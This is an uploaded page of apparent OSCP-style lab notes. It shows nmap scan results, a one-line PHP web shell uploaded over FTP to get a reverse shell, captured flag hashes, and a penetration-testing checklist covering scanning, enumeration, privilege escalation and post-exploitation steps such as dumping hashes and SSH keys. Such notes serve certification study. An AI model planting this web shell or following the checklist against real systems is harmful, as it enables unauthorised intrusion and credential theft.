Add to collection(s) Add to saved
  1. No category
Uploaded by Ankit Upadhyay

inclusiveness.ctb

advertisement 
Discovered open port 22/tcp on 192.168.201.14
Discovered open port 21/tcp on 192.168.201.14
Discovered open port 80/tcp on 192.168.201.14
we found that we have ftp port open
created a simple backdoor for php
<?php system($_GET['cmd']);?>
and uploaded on the ftp portal for the same
simply uploaded the revershell.php and got the reverse shell
user flag
4b09f84b6c1764cf12a192cf4c65ec7e
a8cb0c87e0e78a769d44cd76f21bdbfe
now we need to escalate priveledge to capture the root flag
1/6
Service Exploited:
Vulnerability Type:
Exploit POC:
Description:
Discovery of Vulnerability
Exploit Code Used
Proof\Local.txt File
☐ Screenshot with ifconfig\ipconfig
☐ Submit too OSCP Exam Panel
Operating System
2/6
Architecture
Domain
Installed Updates
Writeable Files\Directories
Directory List
Process List
Installed Applications
Users
Groups
IPConfig\IFConfig
Network Processes
ARP
3/6
DNS
Route
Scheduled Tasks
Service Exploited:
Vulnerability Type:
Exploit POC:
Description:
Discovery of Vulnerability
Exploit Code Used
Proof\Local.txt File
☐ Screenshot with ifconfig\ipconfig
☐ Submit too OSCP Exam Panel
4/6
Software Versions
Potential Exploits
Network Scanning
☐
☐
☐
☐
nmap -sn 10.11.1.*
nmap -sL 10.11.1.*
nbtscan -r 10.11.1.0/24
smbtree
Individual Host Scanning
☐ nmap --top-ports 20 --open -iL iplist.txt
☐ nmap -sS -A -sV -O -p- ipaddress
☐ nmap -sU ipaddress
Service Scanning
WebApp
☐ Nikto
☐ dirb
☐ dirbuster
☐ wpscan
☐ dotdotpwn
☐ view source
☐ davtest\cadevar
☐ droopscan
☐ joomscan
☐ LFI\RFI Test
Linux\Windows
☐ snmpwalk -c public -v1 ipaddress 1
☐ smbclient -L //ipaddress
☐ showmount -e ipaddress port
☐ rpcinfo
☐ Enum4Linux
Anything Else
☐ nmap scripts (locate *nse* | grep servicename)
☐ hydra
☐ MSF Aux Modules
☐ Download the softward
Exploitation
5/6
☐
☐
☐
☐
☐
Gather Version Numbes
Searchsploit
Default Creds
Creds Previously Gathered
Download the software
Post Exploitation
Linux
☐ linux-local-enum.sh
☐ linuxprivchecker.py
☐ linux-exploit-suggestor.sh
☐ unix-privesc-check.py
Windows
☐ wpc.exe
☐ windows-exploit-suggestor.py
☐ windows_privesc_check.py
☐
windows-privesc-check2.exe
Priv Escalation
☐ acesss internal services (portfwd)
☐ add account
Windows
☐ List of exploits
Linux
☐ sudo su
☐ KernelDB
☐ Searchsploit
Final
☐ Screenshot of IPConfig\WhoamI
☐ Copy proof.txt
☐ Dump hashes
☐ Dump SSH Keys
☐ Delete files
6/6
Related documents
Old MIDTERM EXAM for 154
Old MIDTERM EXAM for 154
Beep
Beep
Nmap - Personal Home Pages (at UEL)
Nmap - Personal Home Pages (at UEL)
11-1 scanning
11-1 scanning
BHCSI Intrermediate Java Homework Assignment: Frequency Analysis
BHCSI Intrermediate Java Homework Assignment: Frequency Analysis
CEH Full Exam Quiz
CEH Full Exam Quiz
CN manual for students
CN manual for students
312-50V10 CEH Exam
312-50V10 CEH Exam
ZTM nmap cheatsheet version 1 02
ZTM nmap cheatsheet version 1 02
CEH 312-50
CEH 312-50
OSCP NOTES ACTIVE DIRECTORY 1
OSCP NOTES ACTIVE DIRECTORY 1
CEH v11 Dumps
CEH v11 Dumps
Download
advertisement